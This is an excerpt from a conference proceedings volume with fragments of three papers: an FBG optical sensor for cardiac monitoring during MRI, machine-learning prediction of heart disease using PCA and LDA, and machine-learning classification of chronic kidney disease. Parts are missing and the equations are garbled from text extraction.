716 A. G. Mohapatra et al.
Fig. 3 Contour of total displacement and deformation profile along with force direction
Fig. 5 LabVIEW graphical user interface (GUI) for real-time signal acquisition and acquired signal
Fiber Bragg Grating (FBG) Sensor for the Monitoring … 717
Table 2 Design
Simulation configuration Parameter
configurations of the sensor
element Material Polydimethylsiloxane (PDMS)
Applied frequency 0.33 Hz
Acts/min 20 acts per minute
total deformation of the material layer is evaluated using the FEA simulation, and
the contour of the deformation profile is shown in Fig. 3a. Similarly, the contour of
the total deformation/displacement in the meter is shown in Fig. 3b.
It is clearly understood from the deformation profile as shown in Fig. 4a of the
PDMS layer that the deformation is maximum at the center region of the 3D element.
The FBG sensor element is bonded to the center region of the PDMS deposition
for obtaining maximum sensitivity. Figure 4b shows a snapshot of the fabricated
sensor element.
The signal recording from the fabricated sensor element is performed using the
developed software application in National Instruments LabVIEW platform. Initially,
an SLED optical light source is used, and the FBG interrogator is used to receive
the reflected wavelength. A LabView application is developed to estimate the peak
wavelength from the raw signal recorded from the FBG interrogator. Figure 5a shows
the GUI of the application software developed at the laboratory. Further, the fabricated
FBG sensor is tested using a similar procedure by fixing it on the chest position of
a test subject at the laboratory. The cardiac signal of the test subject is recorded
using the LabVIEW application. Figure 5b shows the real-time raw cardiac signal
recorded using the fabricated FBG sensor element. It is observed that the recorded
signal contains additional noise components, and the P, Q, S, T waves are largely
affected by the noise components; whereas, the R-wave is clearly visible, and it can
be further analyzed to estimate the useful cardiac parameters of a patient under test.
5 Conclusions
The finite element analysis method is used to formulate the design of a fiber Bragg
grating sensor for the real-time acquisition of cardiovascular parameters like heart
rate, respiration rate, oxygen concentration, and chest expansion. It is observed that
the PDMS polymer material is best suitable for the acquisition of the real-time
cardiac signal of the patient under medical examination. The individual responses
718 A. G. Mohapatra et al.
of the sensor element are evaluated successfully in the experimental study. The real-
time cardiac signal is also acquired using the fabricated FBG sensor element which
gives a clear picture of the R-wave of the cardiac signal pattern. The P, Q, S, and
T waves can also be estimated from the raw signal using robust signal processing
or machine learning techniques. The fabricated sensor element is can be used with
the Internet of things (IoT) platform for the monitoring of cardiac parameters of the
patient under MRI test.
Acknowledgements The authors thank the Silicon Institute of Technology, Bhubaneswar, and
Central Glass and Ceramic Research Institute (CGCRI), Kolkata to provide continuous support in
fabricating the FBG sensor during the research work. The authors also thank the Silicon Institute of
Technology, Bhubaneswar to provide license software like LabVIEW, COMSOL Multiphysics and
FBG interrogator to conduct this experiment successfully. We would like to acknowledge the finan-
cial support received under the research project grant scheme TEQIP-III Biju Patnaik University of
Technology (BPUT)Collaborative Research and Innovation Scheme (CRIS) vide Letter No. BPUT-
XIX-TEQIP-III/17/19/119 Dated: 08/11/2019. This work is a part of the Indian Patent filed vide
Ref. No. 202131001862 on/at Date/Time: 2021/01/14 22:58:13 (IST) under Intellectual Property
(IP) India.
References
1. Koivistoinen, T., Junnila, S., Varri, A., & Koobi, T. (2004). A new method for measuring the
ballistocardiogram using EMFi sensors in a normal chair. In The 26th Annual International
Conference of the IEEE Engineering in Medicine and Biology Society (pp. 2026–2029).
2. Dziuda, L., Krej, M., & Skibniewski, F. W. (2013). Fiber Bragg Grating sensor incorporated
to monitor patient vital signs during MRI. IEEE Sensor Journal, 13(12).
3. Paulo Carmo, J., & da Silva, A. M. F. (2012). Application of Fiber Bragg Gratings on wearable
garments. IEEE Sensor Journal, 12(12).
4. Fajkus, M., Nedoma, J., Martinek, R., Vasinek, V., Nazeran, H., & Siska, P. (2017). A non-
invasive multichannel hybrid fiber-optic sensor system for vital sign monitoring. MDPI Sensor.
5. Dziuda, L., Skinbiewski, F., Rozanowski, K., Krej, M., & Lewandowski, J. (2011). Fiber-optic
sensor for respiration and cardiac activity. IEEE.
6. Dziuda, L., Skibniewski, F. W., Krej, M., & Lewandowski, J. (2012). Monitoring respiration
and cardiac activity using Fiber Bragg Grating based sensor. IEEE Transactions on Biomedical
Engineering, 59(7).
7. Wo, J., Wang, H., Sun, Q., Shum, P. P., & Liu, D. (2014). Noninvasive respiration movement
sensor based on distributed Bragg reflector fiber laser with beat frequency interrogation. Journal
of Biomedical Optics, 19(1).
8. De jonckheere, J., Narbonneau, F., D’angelo, L. T., Witt, J., Paquet, B., Kinet, D., Kreber,
K., & Logier, R. (2010). FBG-based smart textiles for continuous monitoring of respiratory
movements for healthcare application. IEEE.
9. Silva, A. F., & Carmo, J. P., Mendes, P. M., & Correia, J. H. (2011). Simultaneous cardiac and
respiratory frequency measurement based on single fiber Bragg grating sensor. Measurement
Science and Technology.
10. Wehrle, G., Nohama, P., Kalinowski, H. J., Torres, P. I., & Valente, L.C.G. (2001). A fiber
optic Bragg grating sensor for monitoring ventilator movements. Measurement Science and
Technology 805–809.
11. Elsarnagawy, T. (2015). A simultaneous and validated FBG heartbeat and respiration rate
monitoring systems. Sensors Letters, 13, 1–4.
Fiber Bragg Grating (FBG) Sensor for the Monitoring … 719
12. Dziuda, L., Lewandowski, J., Skibniewski, F., & Nowicki, G. (2012). Fiber-optics sensor for
respiration and heart rate monitoring in the MRI environment.
13. Krej, M., Baran, P., & Dziuda, L. (2019). Detection of respiratory rate using a classifier of
waves in the signal from a FBG-based vital signs sensor. Elsevier.
14. De. Jonckheer, J., Jeanne, M., Grillet, A., Weber, S., Chaud, P., Logier, R., & Weber, J. L.
(2007). OFSETH: Optical fiber embedded into technical textile for healthcare, an efficient way
to monitor patient under magnetic resonance imaging. In Annual International Conference of
the IEEE Engineering in Medicine and Biology Society.
15. Gurkan, D., Starodubov, D., & Yuan, X. (2005). Monitoring of the heartbeat sounds using an
optical Fiber Bragg Grating sensor. IEEE.
16. Hao, J., Jayachandran, M., KNG, P. L., Foo, S. F., Aung, P. W. A., & Cai, Z. (2009). FBG-based
smart bed system for healthcare applications. Optoelectron China, 3(2), 78–83.
17. Mohapatra, A. G., Khanna, A., Gupta, D., Mohanty, M., & de Albuquerque, V. H. C. (2020).
An experimental approach to evaluate machine learning models for the estimation of load
distribution on suspension bridge using FBG sensors and IoT. Computational Intelligence.
Early-Stage Coronary Ailment
Prediction Using Dimensionality
Reduction and Data Mining Techniques
1 Introduction
Data mining is the process of identifying the unseen order and tendency in the
database and using that vital information to construct predictive models. In the
healthcare industry, data mining has become very popular in detecting diseases [1].
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 721
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_58
722 K. Dutta et al.
about the methodology and materials which explain the data inspection and feature
extraction. Sections 3.1 and 3.2 describe the various algorithms implemented in the
paper. Section 4 comprises of results, scrutiny and comparison of models. Section 5
is all about the conclusion and future work.
2 Related Works
Rajkumar et al. (2010) did research for forecasting whether a person has a cardio-
vascular illness or not. They collected the dataset from the UCI repository having
303 instances and 13 attributes. They used KNN, decision list and Naïve Bayes
for the classification. They obtained that Naïve Bayes obtained 52.33% accuracy,
while decision list and KNN obtained 52% and 45.67% accuracy, respectively [13].
Kangwanariyakul et al. (2010), used different data mining neural network techniques
and support vector machine (SVM) to build automated technology for classifying
Ischemic Heart Disease (IHD) patients. They obtained the dataset by measuring the
cardiac magnetic fields at 36 locations (6 × 6 matrices) above the torso. They found
that Bayesian neural network (BNN) and Back-propagation neural network (BPNN)
was the best model with 78.43% accuracy, while SVM (RBF Kernel) obtained the
least accuracy of 60.78%. Sensitivity for BNN was highest at 96.55% while SVM
(RBF Kernel) has the least sensitivity of 41.38%. Both RBF kernel SVM and poly-
nomial kernel SVM displayed the maximum and minimum specificity of 86.36%
and 45.45%, respectively, [14].
Nayak et al. (2019) did a research on dataset taken from the UCI repository having
303 instances with 14 attributes including the target variable. They used various
machine learning algorithms like decision tree, SVM, Naïve Bayes and KNN. They
found that Naïve Bayes and SVM 88.67% and 81.13%, respectively, while KNN
has the least accuracy of 67.92% only [15]. Then, Mohan et al. (2019) put forward
a novel method, for increasing the accuracy of cardiovascular disease prediction,
named a hybrid random forest with a linear model (HRFLM). In addition to HRFLM,
they also applied support vector machine, random forest, decision tree, recurrent
fuzzy neural network (RFNN), logistic regression, Naïve Bayes, deep learning and
ensemble methods. Their research was based on the Cleveland heart disease dataset
from the UCI repository having 297 instances with 13 attributes. Their proposed
model HRFLM obtained the highest accuracy of 88.4%, while the voting classifier
and SVM also performed well with 87.41 and 86.1%. The Naïve Bayes algorithm
has the lowest accuracy of 75.8% [6].
Thomas et al. (2016) surveyed different classification algorithms for predicting
the possibility of heart disease of each person based on 13 attributes such as gender,
age, cholesterol, pulse rate, blood pressure. They used various machine learning
techniques such as neural network, KNN, Naïve Bayes and decision tree on a different
number of attributes. They concluded that the accuracy of the algorithms increased
when a greater number of attributes were used [16]. Buettner et al. (2019) worked on
predicting heart disease with random forest classifier on Cleveland dataset having 303
724 K. Dutta et al.
instances with 13 attributes. They trained the model with tenfold cross-validation and
also without it. They found that four various categories of chest pain type (atypical
anginal, asymptomatic, nonanginal and typical anginal), heart disease status and
major vessel number were very important for heart disease classification. The model
achieved an accuracy of 84.448% with cross-validation and 82.895% without cross-
validation [17]. Banu et al. (2014) discussed Clustering such as k-Means Clustering,
Association Rule Learning like Maximal Frequent Itemset Algorithm (MAFIA) and
classification techniques like decision tree, Naïve Bayes, neural network and C4.5
algorithm for exploring heart disease. They found that K-mean-based MAFIA with
ID3 and C4.5 was the best model with an accuracy of 89% [18]. Waghulde et al. (2014)
demonstrated the genetic neural network technique for heart disease prediction using
Cleveland dataset and thus obtained 98% accuracy [19].
Machine learning or data mining has become one of the advanced technologies for
the health care sector [20, 21]. With help of machine learning or deep learning, many
diseases can be predicted in real time and the entire health industry can be benefitted
from it. This paper deals with predicting whether a person has heart or cardiovascular
disease or not. Data classification algorithms like artificial neural network (ANN),
decision tree, random forest, KNN, SVM, logistic regression and ensemble methods
were applied for detecting whether a person has a heart problem or not and has been
discussed Fig. 1.
ANN is a computational or mathematical model inspired by the human nervous
system [22]. ANN has the unique feature of establishing a relationship between
dependent and independent variables and pulls out vital information and complex
knowledge from datasets. ANN consists of output and input layer nodes, which
are connected by hidden nodes, and weights are assigned to each node. Hidden
layer nodes fire activation functions to pass information to the input nodes [23].
Logistic regression is mainly used to predict the results of the input to a selected set
of classes. The logistic sigmoid function is generally used to transform the output
in classification [24]. A linear equation is taken as an input in logistic regression,
and then, the sigmoid function undergoes the tasks of binary classification. KNN
is a non-parametric algorithm, in which the number of neighbors (k) is chosen.
Generally, the Euclidean distance method for the calculation process is used for
the identification. After calculating, the distance sorting must be done in increasing
order on the basis of distance. Then, the most frequent class of the rows is taken to
return the predicted values [25]. To maximize the predictive accuracy, there are two
parts of the support vector machine, i.e., SRM and ERM. SRM decreases an upper
limit on the expected chance, whereas ERM decreases the error on training data. In
the SVM algorithm, every data is plotted as a point in n-dimensional space. Then,
the classification gets proceeded by searching the hyper-plane, which reduces the
similarities between the two classes. SVM does not perform well on noisy dataset
[26]. A collection of algorithms based on Bayes’ theorem together form Naïve Bayes
classifier. This algorithm comprises a set of algorithms where a common principle
is shared that is every pair of features that are being classified is independent of
each other. Decision tree Classifier [27] is like an if-else condition. The condition
is applied to the tree which then leads to either an internal node or to a leaf node.
This algorithm mainly works recursively that choose the best diving criteria for the
dataset to build the tree. One main advantage of the decision tree algorithm is that
compared to other algorithms decision tree requires less effort for the preparation
during the pre-processing. The noisy dataset and overfitting are checked by pruning
trees. Random forest Classifier [28] creates a set of decision trees that collects the
votes from randomly chosen sub-group of the training set to determine the class of the
test object. Random forest classifier includes extra randomness in the model while
creating the tree. Despite looking for an important attribute in the process of splitting,
it selects the best attribute within a random set. One of the main disadvantages of
a random forest classifier is that it has a tendency to overfit, so the tuning of the
hyperparameters is necessary. One of the incremental learning algorithms is the
Passive Aggressive algorithm. The main formula of this classifier is that it adjusts
its weight vector against every misclassified training samples. Passive Aggressive
Classifier comprises of two words, “passive” which explains that if the prediction is
correct, no changes are needed to make in the model but “aggressive” depicts that if
the prediction is not correct, some changes are required which may correct the model
[29]. Ada boosting algorithm is an ensemble technique meta-algorithm. The main aim
of this algorithm is that it works as a strong classifier for many weak classifiers. For a
binary classification problem, Ada Boost is considered as the first successful boosting
algorithm. In the parallel ensemble method, a base learner is created in parallel
and sequential, learners are generated sequentially [30]. AdaBoost machine learning
model is then iteratively trained through the selection of the training set on the basis
of accuracy. Selection of the higher weight is done with comparison to classified
results so that the probability gets more in the next interactions. Simultaneously, it
726 K. Dutta et al.
puts the weight on the classifier which is trained at first at each iteration depending
on the accuracies of the classifiers. The process gets iterated till the whole training
data fits without any fault [31]. One of the interesting ensemble solutions which are
considered as a stacking subset is offered by a voting classifier which is evaluated in
parallel to exploit various peculiarities of the algorithm. Two different strategies are
followed, i.e., hard voting in which class has received the highest number of votes
that must be chosen and soft voting where for all the classifiers, and the probability
vectors for each of the predicted classes are summed [32].
Exploring the dataset is one of the important parts of machine learning algorithms as
it helps us to study the statistics and class of the data. The dataset has been collected
from Kaggle [33] in csv format which includes 303 patient records with 13 attributes
and 1 target variable. The dataset was divided into two parts, i.e., 30% for testing
and 70% for training. Figure 2 shows the correlation graph of the dataset.
Data mining or machine learning algorithms have a very important part in selecting
the minimum number of attributes for training the model, so that computation cost
is decreased and also for improving the performance of the algorithm [34, 35]. This
paper uses two dimensionality reduction techniques like LDA and PCA.
Early-Stage Coronary Ailment Prediction Using Dimensionality … 727
4 Result
The performance of the different classifiers needs to be evaluated for noticing the
correctness and execution of the test dataset and selecting the prime model. The
performance of the algorithms can be described by evaluating different metrics like
precision, recall, F 1 -score, AUC Score, accuracy and balanced accuracy (BAC),
obtained from confusion metrics having four outcomes. Table 1 shows the confusion
matrix of all the classifiers used in the paper. Tables 2 and 3 show the performance
of various metrics for LDA and PCA, respectively. The performance of the different
models concerning the evaluating metrics has been shown graphically in Figs. 3 and
4.
The different evaluating metrics can be calculated with the help of the confu-
sion matrix [39, 40]. The mathematical equations for the various metrics have been
discussed in Eqs. 1–4.
Tp + Tn
Accuracy = (1)
Tp + Tn + Fp + Fn
Tp
Precision = (2)
Tp + Fp
Tp
Recall = (3)
Tp + Fn
(P*R)
F1 score = 2* (4)
(P + R)
where Tp is the true positive, Tn refers to true negative, Fp is the false positive, Fn
means false negative, P refers to precision and R is the recall.
SP − PE(NO + 1)/2
AUC = (5)
PE ∗ NO
where NO is the negative observations, PE is the positive examples and SP refers
to sum of positive observations.
Table 3 shows the results of the different algorithms trained with Principal Compo-
nent Analysis (PCA). It has been observed that the artificial neural network (ANN)
performed well on the dataset with 88.52% accuracy, 88.56% recall, 88.31% preci-
sion and 88.41% F 1 -score. Logistic regression, SVC and voting classifier also
performed better with 86.89% accuracy, 86.33% recall, 87.06% precision and 86.59%
F 1 -score. K-Nearest Neighbors did not perform well as it achieved 65.57% accu-
racy, 66.07% recall, 65.89% precision and 65.54% F 1 -score. Table 4 shows the results
of the different algorithms trained with LDA. It has been observed that the artificial
neural network (ANN) performed well on the dataset with 85.24% accuracy, 84.61%
recall, 81.48% precision and 83.01% F 1 -score. Logistic regression, SVC and voting
classifier also performed better with 83.61% accuracy, 83.01% recall, 83.67% preci-
sion and 83.24% F 1 -score. Passive Aggressive Classifier did not perform well as it
achieved 60.66% accuracy, 55.56% recall, 46.96% F-1score and 79.31% precision.
730 K. Dutta et al.
Data mining in the healthcare industry is unlike the other sector, as the datasets
available are heterogeneous and certain social, legal and ethical restrictions apply to
Early-Stage Coronary Ailment Prediction Using Dimensionality … 731
medical information. The primary motivation of the paper is to furnish more insight
into cardiovascular disease prediction as it is very important and challenging in the
healthcare organization. If the heart disease is detected at an early stage and the
medications were done, then the mortality rate can be controlled drastically. Various
machine learning and deep learning algorithms such as ANN, random forest, deci-
sion tree, Ada Boost, Naïve Bayes, KNN, SVM, voting classifier, logistic regression
and Passive Aggressive have been trained with PCA and LDA dimensionality reduc-
tion techniques for efficacious and efficient heart disease diagnosis. The study also
makes use of LDA and PCA for dimensionality reduction. The best algorithm was
artificial neural network, which achieved 88.52% accuracy when trained with PCA
and 85.24% accuracy when trained with LDA.
In the future, the research can be performed with many data mining algorithms for
predicting the disease more accurately and efficiently. The dataset can be enlarged
for better prediction. Need to explore various rules such as Clustering, K-means for
ease of simplicity and better efficiency.
References
1. Bhatla, N., & Jyoti, K. (2012). An analysis of heart disease prediction using different data
mining techniques. International Journal Engineering Research and Technology, 1(8), 1–4.
2. Palaniappan, S., & Awang, R. (2008). Intelligent heart disease prediction system using data
mining techniques. AICCSA 08—6th IEEE/ACS international conference on computer systems
and applications (pp. 108–115). doi: https://doi.org/10.1109/AICCSA.2008.4493524.
3. Jalali, S. M. J., Karimi, M., Khosravi, A., & Nahavandi, S. (2019). An efficient neuroevolution
approach for heart disease detection. In 2019 IEEE international conference on Systems, Man
and Cybernetics (SMC), (vol. 77, no. 1, pp. 3771–3776). doi: https://doi.org/10.1109/SMC.
2019.8913997.
4. Alzubi, J. A., Kumar, A., Alzubi, O. A., & Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research & Development, 10(2), 267. https://doi.org/10.5958/0976-5506.2019.00298.5
5. Das, S., Sharma, R., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). Heart disease
detection using core machine learning and deep learning techniques: A comparative study.
International Journal on Emerging Technologies, 11(3), 531–538.
6. Mohan, S., Thirumalai, C., & Srivastava, G. (2019). Effective heart disease prediction using
hybrid machine learning techniques. IEEE Access, 7, 81542–81554. https://doi.org/10.1109/
ACCESS.2019.2923707
7. Dangare, C. S., & Apte, S. S. (2012). Improved study of heart disease prediction system using
data mining classification techniques. International Journal of Computers and Applications,
47(10), 44–48. https://doi.org/10.5120/7228-0076
8. Ramalingam, V. V., Dandapath, A., Karthik Raja, M. (2018). Heart disease prediction using
machine learning techniques: A survey. International Journal of Engineering and Technology,
7(2.8), 684–687. doi: https://doi.org/10.14419/ijet.v7i2.8.10557.
9. Nayak, S., Gourisaria, M. K., Pandey, M., & Rautaray, S. S. (2020). Comparative analysis of
heart disease classification algorithms using big data analytical tool. 582–588.
10. Jee, G., Harshvardhan, G., & Gourisaria, M. K. (2021). Juxtaposing inference capabilities of
deep neural models over posteroanterior chest radiographs facilitating COVID-19 detection.
Journal of Interdisciplinary Mathematics 1–27. doi: https://doi.org/10.1080/09720502.2020.
1838061.
732 K. Dutta et al.
11. Atallah, R., & Al-Mousa, A. (2019). Heart disease detection using machine learning majority
voting ensemble method. In 2019 2nd International Conference on new Trends in Computing
Sciences (ICTCS) (pp 1–6). doi: https://doi.org/10.1109/ICTCS.2019.8923053.
12. Nayak, S., Kumar Gourisaria, M., Pandey, M., & Swarup Rautaray, S. (2019). Heart disease
prediction using frequent item set mining and classification technique. International Journal
of Information Engineering and Electronic Business, 11(6), 9–15. doi: https://doi.org/10.5815/
ijieeb.2019.06.02.
13. Rajkumar, A., & Reena, G. S. (2010). Diagnosis of heart disease using datamining algorithm.
Global Jounal Computer Science and Technology, 10(10), 38–43.
14. Kangwanariyakul, Y., Nantasenamat, C., Tantimongcolwat, T., & Naenna, T. (2010). Data
mining of magnetocardiograms for prediction of ischemic heart disease. EXCLI Journal, 9,
82–95. doi: https://doi.org/10.17877/DE290R-15805.
15. Nayak, S., Gourisaria, M. K., Pandey, M., & Rautaray, S. S. (2019). Prediction of heart disease
by mining frequent items and classification techniques. In 2019 International conference on
Intelligent Computing and Control Systems (ICCS) (pp. 607–611). doi: https://doi.org/10.1109/
ICCS45141.2019.9065805.
16. Princy, R. T., & Thomas, J. (2017). Human heart disease prediction system using data mining
techniques. In Proceedings of the IEEE International Conference on Circuit, Power and
Computing Technologies (ICCPCT) 2017.
17. Buettner, R., & Schunter, M. (2019). Efficient machine learning based detection of heart
disease. 2019 IEEE international conference on E-health networking, application & services
(HealthCom) 2019. doi: https://doi.org/10.1109/HealthCom46333.2019.9009429.
18. Nishara Banu, M. A., & Gomathy, B. (2014). Disease forecasting system using data mining
methods. In International Conference on Intelligent Computing Applications (ICICA) 2014
(pp. 130–133). doi: https://doi.org/10.1109/ICICA.2014.36.
19. Waghulde, N. P., & Patil, N. P. (2014). Genetic neural approach for heart disease prediction.
International Journal of Advanced Computer Research, 4(3), 778–784.
20. Dey, S., Gourisaria, M. K., Rautray, S. S., & Pandey, M. (2021). Segmentation of Nuclei in
microscopy images across varied experimental systems. 87–95.
21. Rautaray, S. S., Dey, S., Pandey, M., & Gourisaria, M. K. (2020). Nuclei segmentation in
cell images using fully convolutional neural networks. International Journal on Emerging and
Technology, 11(3), 731–737.
22. Abraham, A. (2005). Artificial neural networks. In Handbook of Measuring System Design.
Wiley.
23. Sharma, S., Gourisaria, M. K., Rautray, S. S., Pandey, M., & Patra, S. S. (2020). ECG classi-
fication using deep convolutional neural networks and data analysis. International Journal of
Advanced Trends in Computer Science and Engineering, 9, 5788–5795.
24. Tsangaratos, P., & Ilia, I. (2016). Comparison of a logistic regression and Naïve Bayes classifier
in landslide susceptibility assessments: The influence of models complexity and training dataset
size. CATENA, 145, 164–179. https://doi.org/10.1016/j.catena.2016.06.004
25. Alzubi, O., Alzubi, J., Tedmori, S., Rashaideh, H., & Almomani, O. (2018). Consensus-based
combining method for classifier ensembles. The International Arab Journal of Information
Technology, 15(1), 76–86.
26. Mavroforakis, M. E., & Theodoridis, S. (2006). A geometric approach to Support Vector
Machine (SVM) classification. IEEE Transactions on Neural Networks, 17(3), 671–682. https://
doi.org/10.1109/TNN.2006.873281
27. Swain, P. H., & Hauska, H. (1977). The decision tree classifier: Design and potential. IEEE
Transactions on Geoscience Electronics, 15(3), 142–147. https://doi.org/10.1109/TGE.1977.
6498972
28. Azar, A. T., Elshazly, H. I., Hassanien, A. E., & Elkorany, A. M. (2014). A random forest
classifier for lymph diseases. Computer Methods and Programs in Biomedicine, 113(2), 465–
473. https://doi.org/10.1016/j.cmpb.2013.11.004
29. Hosseinzadeh, H., Razzazi, F., & Haghbin, A. (2015). A self training approach to auto-
matic modulation classification based on semi-supervised online passive aggressive algorithm.
Early-Stage Coronary Ailment Prediction Using Dimensionality … 733
Abstract Kidney is a vital and essential organ as it helps to get rid of waste and
subsidiary fluids from our body. Our kidneys do away with acids that are secreted
cells present in our body, and thus, a stability of salts, water and minerals such as
Potassium, Sodium, Calcium and Phosphorus in our blood is maintained. Kidneys
also produce hormones that keep our blood pressure in control, make red blood
cells, and keep our bones robust and resilient. Hence taking care and maintaining the
proper health of our kidney are of utmost importance and significance. Prediction
and identification of kidney diseases at the primitive stage will give us an advantage
and persuade us to take further required medical treatments. The dataset imported has
been preprocessed by removing all the redundant features and contrasting data mining
classification methods like decision tree classification, RF, SVM classification, Naïve
Bayes and k-NN classification are implemented in this paper for discernment and
screening of the diseases. The accuracy of the prediction produced by each of the
classification techniques has been compared and exhibited in different performance
metrics such as specificity, sensitivity, negative predictive value, positive predictive
value and accuracy. It has been computed that random forest classifier achieved the
highest accuracy of 98.81% surpassing all the other classification techniques.
1 Introduction
Health care is the nurture and health refinement through avoidance, detection, therapy,
recuperation and the healing of diseases. It is a part of life and without genuine and
proper healthcare the population is far more at risk and peril. But the major altercation
is to supply advanced care and services of medicinal at an inexpensive monetary
value. However, diseases being diagnosed in the elementary stage will spare the
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 735
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_59
736 R. Pramanik et al.
victim from the cost of complicated treatments, and thus, the expenditure is expected
to cease significantly. Chronic kidney disease (CKD) is the form of disorder when
the kidneys are blemished, loses its ability to filter the blood properly and causes
the wastes to pile up in the body. The disorder is termed as ‘chronic’ because the
kidneys are damaged steadily over a period of time. The most challenging task is the
abstraction of an enormous amount of input for supervising the patient’s information
and statistics of health care. So the required filtration of data is applied and different
data mining classification approaches such as random forest, decision tree classifier,
SVM, KNN and Naive Bayes classifier are exercised to locate and intercept the
diseases [1]. The data employed here was recorded in India for a period of two
months with the number of features of 25, example blood pressure, sugar and many
more.
The various parts into which this research paper is segmented are as mentioned.
Outline of the chronic kidney disorder is present in Sect. 2. Section 3 supplies an
account relating to literature survey of kidney disorders. The flowchart of working is
chronicled in Sect. 4. An abridged analysis of the classification techniques such as
SVM, decision tree, RF, Naive Bayes and KNN is done in Sect. 6. Section 7 is about
the analysis of result of various models used for prediction. The inference, a quick
survey of the document and future work that can be done based on this research, is
provided in Sect. 8.
Chronic kidney disease is a deep-rooted condition where the kidneys fail to work
properly and perform its basic functions. The risk of getting vulnerable to this disease
increases with age. However, anyone can get affected by it, but it is more regular
to people who are black or hailing from countries of South Asia. There are several
factors which increases the risk of CKD which is mentioned in Fig. 1.
Prediction of CKD will help to initiate the required treatment from an elementary
stage and thus reduce both the expenditure and risk of further complicated treatment
procedure. There are total 5 stages [2] of CKD namely:
Stage 1: mild kidney damage, protein in urine.
Stage 2: fatigue, low appetite, weakness.
Inferring the Occurrence of Chronic Kidney Failure … 737
Stage 3: anaemia (low RBC count), high blood pressure, bone disease.
Stage 4: nausea and vomiting, complete loss of appetite.
Stage 5: Risk of heart disease and stroke, kidney failure.
In 2011, 63,538 CKD cases has been registered by the CKD Registry of India and
the numbers are growing significantly each year [3]. And an approximate of 10% of
the international population has the condition of chronic kidney disease (CKD), and
every year millions expires due to the shortage of inexpensive treatment. As per the
global burden of disease study made in 2010, CKD got the position of 27th in the
catalogue of reasons of global death in 1990, and in 2010 the rank was increased to
18th. Only HIV and AIDS have this kind of proportion of levelling up in the rank
table [4].
3 Literature Survey
Aljaaf et al. studied and predicted the diagnosis of chronic kidney disorder at an
elementary stage and a total of 4 classification techniques of machine learning has
been used to picture the outcome [5]. Almansour et al. used SVM and ANN for the
detection of CKD or chronic kidney disorder. A dataset comprising of 400 samples
and 24 features has been employed for the same [6]. Xiao et al. predicted the seri-
ousness of the chronic kidney disorder. The number of machine learning models
exercised for the diagnosis is 9 including ridge regression, logistic regression and
random forest. With AUC 0.873, the best accuracy was given by logistic regression
[7]. Charleonnan et al. inspected four techniques of machine learning comprising
LR, KNN, SVM and decision tree and the presence of chronic kidney disease is
predicted [8]. Saha et al. predicted the presence of CKD using various ML classifica-
tion methods as logistic regression, Naïve Bayes, multilayer perceptron, Adam-DNN
and random forest. The highest accuracy of 97.35% is achieved by Adam-DNN [9].
Sinha et al. compared the measure of performance based on precision, execution time
and accuracy of KNN and support vector machine in the prediction of chronic kidney
disorder. It has been observed that the accuracy of SVM is less than that of K nearest
neighbour [10]. Qin et al. have explored six classification methods including Naïve
Bayes, SVM, feed forward neural network, random forest and KNN out of which
random forest has ranked first with the highest accuracy of 99.75% [11]. Almasoud
et al. performed different tests like ANOVA test, Cramer’s V test and Pearson’s corre-
lation to deduct all the unnecessary features in the dataset and after training various
algorithms such as gradient boosting, logistic regression, random forest and SVM,
99.1% accuracy has been achieved [12]. Rubini et al. used three classifiers namely
logistic regression, radial basis function and multilayer perceptron and put forward
a new dataset of chronic kidney disease. The outcome of the experiment is shown in
terms of accuracy, sensitivity, f -score, specificity and type I and II error. The harmony
between the expert classification and the classifier is measured by the Kappa Value
738 R. Pramanik et al.
[13]. Devika et al. performed classification using several machine learning classifi-
cation models like random forest, K-Nearest neighbour and Naïve Bayes for chronic
kidney disease diagnosis and the performance is measured based on execution time,
accuracy and preciseness. The outcome predicted by random forest is found to be
better than the other two classification algorithm used in the experiment [14].
4 Proposed Model
The main aim of the models are to predict if a patient is suffering from CKD or
not based on various features that has been provided in the data set. The complete
workflow of which has been illustrated in Fig. 2. First, the raw data has been imported
and pre-processing techniques such as removal of outliers, converting object type to
numerical type and imputing missing values has been performed. The attributes are
filtered and the necessary features are passed onto the classification model so that
a better accuracy is achieved [15]. The classification algorithm used in this case is
namely LR, SVM, Naïve Bayes, KNN, decision tree and RF. In machine learning, we
come across a vast range of metrics that are used to measure the performance of the
models. However in this approach, the performance metrics of sensitivity, specificity,
PPV, NPV and accuracy have been employed.
On analyzing the dataset, a total number of numerical and categorical variables are
found to be 12 and 13, respectively [16]. However, on observing the type of few
numerical variables they are found to be of object type and the reason being the
presence of garbage characters. Hence the same variables are converted to numerical
type after replacing the garbage characters with NAN value. The total number of
Inferring the Occurrence of Chronic Kidney Failure … 739
missing values of each columns are computed and it has been found that there are a
huge set of data with missing values, highest being RBC with total of 107 missing
data. As the number of sample in this dataset is considerably small, so deleting
every rows comprising of missing values will not be efficient so the missing values
of numerical columns and categorical columns are imputed [17] with median and
mode, respectively. Next, the number of outliers of each data column is examined
using z-score analysis and almost all the attributes have outliers which has then been
imputed with median [18].
For dimensionality reduction all the non-numerical categorical attributes are
converted to numeric using binary values [19]. Correlation between the attributes are
displayed using the heatmap which is displayed in Fig. 3 and attributes are dropped
by taking more than 0.6 as absolute co-efficient [20].
6 Classification Methods
Split Point
Internal Internal
node node
This technique is one of the most used methods for classification problems that are
binary with many benefits and drawbacks which are listed in Table 2. The logistic
function which is used in this technique is the basis for the name of logistic regression.
Statisticians developed the sigmoid function or the logistic function to express the
features of growth in population. It is basically a curve of S shaped that can take any
Inferring the Occurrence of Chronic Kidney Failure … 741
real valued input and then scale it between the ranges of 0–1. Logistic regression
can be further classified into different types such as ordinal LR, multinomial LR and
binary LR [23]. The logistic function which forms the basis of logistic regression is
depicted by the equation
1
σ (z) = p = (1)
1 + e−z
A Bayes Theorem based algorithm, this technique is used to find the solution of
classification problems. Naïve Bayes classifier builds machine learning models that
are very fast and produce predictions quickly. It is one of the most fruitful and easy
algorithms, but has downsides too, all of which are stated in Table 3. The Bayes
Theorem formula is computed as
P(B|A)P(A)
P(A|B) = (2)
P(B)
Employed for both classification and regression, this is one of the most commonly
